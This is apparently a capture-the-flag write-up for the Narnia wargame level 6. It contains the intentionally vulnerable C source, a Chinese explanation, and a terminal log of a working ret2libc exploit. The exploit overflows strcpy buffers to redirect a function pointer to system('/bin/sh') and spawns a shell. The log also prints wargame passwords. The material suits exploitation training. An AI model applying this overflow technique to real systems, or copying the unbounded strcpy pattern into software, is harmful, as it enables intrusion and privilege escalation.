/** narnia6.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern char **environ;
// tired of fixing values...
// - morla
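/*
 * get_sp - return the top byte of the stack pointer (esp & 0xff000000).
 *
 * main() compares this against the top byte of its function pointer to
 * detect a pointer that has been redirected into the stack.  This is a
 * 32-bit x86 construct: the asm reads %esp and the mask is 32 bits wide.
 *
 * The original version left the value in %eax and fell off the end of a
 * non-void function with no return statement.  Reading the return value of
 * such a function is undefined behaviour; it only "worked" because the
 * unoptimised caller happened to pick the result up from %eax.  The basic
 * asm also clobbered %eax without telling the compiler.  An output operand
 * and an explicit return make the result well-defined while producing the
 * same value as before.
 */
unsigned long get_sp(void) {
	unsigned long sp;
	/* "=a": the result is produced in %eax and the compiler knows it. */
	__asm__("movl %%esp,%%eax\n\t"
	        "and $0xff000000, %%eax"
	        : "=a"(sp));
	return sp;
}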
int main(int argc, char *argv[])
{
/*
 * Intentionally vulnerable wargame target (narnia6).
 *
 * Copies two attacker-controlled arguments into 8-byte stack buffers with
 * unbounded strcpy(), then calls through a function pointer that lives in
 * the same stack frame.  The only mitigation is the top-byte check before
 * the call, which is the subject of the writeup below.
 *
 * argv[1], argv[2]: untrusted, unbounded input.
 * Terminates via exit(): -1 on a usage error or when the check trips,
 * 1 after the indirect call returns.
 */
char b1[8], b2[8];
/* fp starts out pointing at puts().  It sits in the same frame as b1/b2,
 * so an overflow of either buffer can overwrite it. */
int (*fp)(char *)=(int(*)(char *))&puts, i;
if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }
/* clear environ: overwrite the contents of every environment string with
 * NULs (the environ[] pointers themselves are left in place) - presumably
 * so no payload can be staged in the environment. */
for(i=0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
/* clear argz: likewise zero every argument after the two that are used */
for(i=3; argv[i] != NULL; i++)
memset(argv[i], '\0', strlen(argv[i]));
/* No length check on either copy: anything beyond 8 bytes overruns into
 * whatever the compiler placed next to the buffer.  Which slot each
 * overflow reaches depends on the frame layout; the exploit below relies
 * on argv[1] overrunning b1 into fp and argv[2] overrunning b2 into b1. */
strcpy(b1,argv[1]);
strcpy(b2,argv[2]);
//if(((unsigned long)fp & 0xff000000) == 0xff000000)
/* Mitigation: refuse to call fp when its top byte equals the stack's top
 * byte (get_sp()), i.e. when fp was redirected into the stack.  It does
 * not reject a pointer into a shared library such as libc (0xf7...),
 * which is exactly how the challenge is solved. */
if(((unsigned long)fp & 0xff000000) == get_sp())
exit(-1);
/* Calls whatever fp now points to, with b1 (attacker data) as argument. */
fp(b1);
exit(1);
}
fp本来初始化为puts函数的
要用 system 的地址替换 fp，首先得找到 system 函数的地址，可以在 gdb 中用 p system 命令获取。注意这个地址要按小端序写入 argv[1]（0xf7e63cd0 对应 \xd0\x3c\xe6\xf7），而且前提是目标关闭了 ASLR、gdb 内外 libc 的加载基址一致，gdb 里看到的地址才能直接用于 gdb 之外。
再把 b1 覆盖成 /bin/sh：由于 strcpy(b2) 在 strcpy(b1) 之后执行，而从 exploit 的效果可以看出 b2 在栈上紧挨在 b1 下方，用 8 个字节填满 b2 后多出的 /bin/sh 就会溢出写进 b1。
那最终调用 fp(b1) 就变成了调用 system("/bin/sh")。程序里的 get_sp() 检查只拦截高字节等于栈地址高字节（0xff）的 fp，而 system 位于 libc（0xf7……），因此检查不会触发。
root@today:~# ssh narnia6@178.79.134.250
narnia6@178.79.134.250's password: neezocaeng
narnia6@melinda:~$ cd /narnia
narnia6@melinda:/narnia$ gdb -tui narnia6
(gdb) b main
(gdb) run `python -c 'print "AAAAAAAA\xff\xff\xff\xff"'` `python -c 'print "AAAAAAAA/bin/sh"'`
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e63cd0 <system>
narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "AAAAAAAA\xd0\x3c\xe6\xf7"'` `python -c 'print "AAAAAAAA/bin/sh"'`
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
ahkiaziphu
$
参考1: http://blog.csdn.net/linyt/article/details/43643499